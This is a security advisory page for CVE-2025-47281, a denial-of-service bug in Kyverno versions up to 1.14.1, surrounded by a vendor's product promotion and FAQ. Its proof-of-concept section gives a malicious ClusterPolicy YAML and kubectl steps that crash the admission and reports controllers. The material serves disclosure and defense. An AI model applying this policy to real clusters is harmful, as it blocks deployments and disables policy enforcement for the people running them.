Summary
A Denial of Service (DoS) vulnerability exists in Kyverno due to improper handling of JMESPath variable substitutions. Attackers with permissions to create or update Kyverno policies can craft expressions using the {{@}} variable combined with a pipe and an invalid JMESPath function (e.g., {{@ | non_existent_function }}).
This leads to a nil value being substituted into the policy structure. Subsequent processing by internal functions, specifically getValueAsStringMap, which expect string values, results in a panic due to a type assertion failure (interface {} is nil, not string). This crashes Kyverno worker threads in the admission controller (and can lead to full admission controller unavailability in Enforce mode) and causes continuous crashes of the reports controller pod, leading to service degradation or unavailability."
Details
The vulnerability lies in the getValueAsStringMap function within pkg/engine/wildcards/wildcards.go (specifically around line 138):
func getValueAsStringMap(key string, data interface{}) (string, map[string]string) {
// ...
valMap, ok := val.(map[string]interface{}) // val can be the map containing the nil value
// ...
for k, v := range valMap { // If valMap contains a key whose value is nil...
result[k] = v.(string) // PANIC: v.(string) on a nil interface{}
}
return patternKey, result
}
When a policy contains a variable like {{@ | foo}} (where foo is not a defined JMESPath function), the JMESPath evaluation within Kyverno's variable substitution logic results in a nil value. This nil is then assigned to the corresponding field in the policy pattern (e.g., a label value).
During policy processing, ExpandInMetadata calls expandWildcardsInTag, which in turn calls getValueAsStringMap. If the data argument to getValueAsStringMap (derived from the policy pattern) contains this nil value where a string is expected, the type assertion v.(string) panics when v is nil.
Proof of Concept (PoC)
This proof of concept consists of two phases. First a malicious policy is inserted with the default validation failure action, which is Audit. In this phase the reports controller will end up in a crash loop. The admission controller will print out a similar stack trace, but only a worker crashes. The admission controller process does not crash.
In the second phase the same policy is inserted with the Enforce validation failure action. In this scenario both admission controller and the reports controller end up in a crash loop. As the admission controller crashes on incoming admission requests, it effectively makes it impossible to deploy new resources.
Tested on Kyverno v1.14.1.
Prerequisites:
Kubernetes cluster with Kyverno installed. Attacker has permissions to create/updateClusterPolicyorPolicyresources.Create a Malicious Policy:
Apply the followingClusterPolicy:apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: dos-via-jmespath-nil spec: rules: - name: trigger-nil-panic match: any: - resources: kinds: - Pod validate: message: "DoS attempt via JMESPath nil substitution" pattern: metadata: labels: # '{{@ | non_existent_function}}' will result in a nil value for this label. # This nil value causes a panic in getValueAsStringMap. trigger_panic: "{{@ | non_existent_function}}"Verify the policy status:
Make sure the policy is ready.k get clusterpolicy dos-via-jmespath-nil NAME ADMISSION BACKGROUND READY AGE MESSAGE dos-via-jmespath-nil true true True 24m ReadyTrigger the Policy:
Create any Pod in any namespace (if not further restricted bymatchorexclude):kubectl run test-pod-dos --image=nginxObserve Crashes:
- Check Kyverno admission controller logs for worker panics (
interface conversion: interface {} is nil, not string). - Check Kyverno reports controller logs; the pod crashes and restarts.
- Stack trace available here (as a secret gist): https://gist.github.com/thevilledev/723392bad36020b82209262275434380
- Check Kyverno admission controller logs for worker panics (
Reset:
Delete the existing policy withkubectl delete clusterpolicy dos-via-jmespath-niland delete
the test pod withkubectl delete pod test-pod-dos. Then apply the following:apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: dos-via-jmespath-nil-enforce spec: validationFailureAction: Enforce # This has changed rules: - name: trigger-nil-panic match: any: - resources: kinds: - Pod validate: message: "DoS attempt via JMESPath nil substitution" pattern: metadata: labels: # '{{@ | non_existent_function}}' will result in a nil value for this label. # This nil value causes a panic in getValueAsStringMap. trigger_panic: "{{@ | non_existent_function}}"Trigger the Policy (again):
Create any Pod in any namespace (if not further restricted bymatchorexclude):kubectl run test-pod-dos --image=nginxThe command returns the following error:
Error from server (InternalError): Internal error occurred: failed calling webhook "validate.kyverno.svc-fail": failed to call webhook: Post "https://kyverno-svc.kyverno.svc:443/validate/fail?timeout=10s": EOFObserve Crashes:
- Check Kyverno admission controller logs for container panic. Notice that the whole controller has crashed, not just a worker.
- Check Kyverno reports controller logs; the pod crashes and restarts.
Mitigation
- Add robust
nilhandling ingetValueAsStringMap. - Look into adding graceful error handling in JMESPath substitution. Prevent evaluation errors (like undefined functions) from resulting in
nilvalues.
Impact
This is a Denial of Service (DoS) vulnerability.
Affected Components:
- Kyverno Admission Controller: In Audit mode, individual worker threads handling admission requests will panic and terminate. While the main pod uses a worker pool and can recover by spawning new workers, repeated exploitation can degrade performance or lead to worker pool exhaustion. In Enforce mode, the whole controller panics. This makes all related admission requests fail.
- Kyverno Reports Controller: The entire controller pod will panic and crash, requiring a restart by Kubernetes. This halts background policy scanning and report generation.
Conditions: An attacker needs permissions to create or update Kyverno
PolicyorClusterPolicyresources. This is often a privileged operation but may be delegated in some environments.Consequences: Degraded policy enforcement, inability to create/update resources, and loss of policy reporting visibility.
The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths. Typical impact: varies by context: data corruption, logic bypass, or denial of service.
CVE-2025-47281 has a CVSS score of 7.7 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.14.2); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2025-47281? CVE-2025-47281 is a high-severity improper input validation vulnerability in github.com/kyverno/kyverno (go), affecting versions <= 1.14.1. It is fixed in 1.14.2. The application does not adequately validate input before processing it, allowing unexpected values to reach sensitive code paths.
- How severe is CVE-2025-47281? CVE-2025-47281 has a CVSS score of 7.7 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of github.com/kyverno/kyverno are affected by CVE-2025-47281? github.com/kyverno/kyverno (go) versions <= 1.14.1 is affected.
- Is there a fix for CVE-2025-47281? Yes. CVE-2025-47281 is fixed in 1.14.2. Upgrade to this version or later.
- Is CVE-2025-47281 exploitable, and should I be worried? Whether CVE-2025-47281 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2025-47281 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2025-47281? Upgrade
github.com/kyverno/kyvernoto 1.14.2 or later.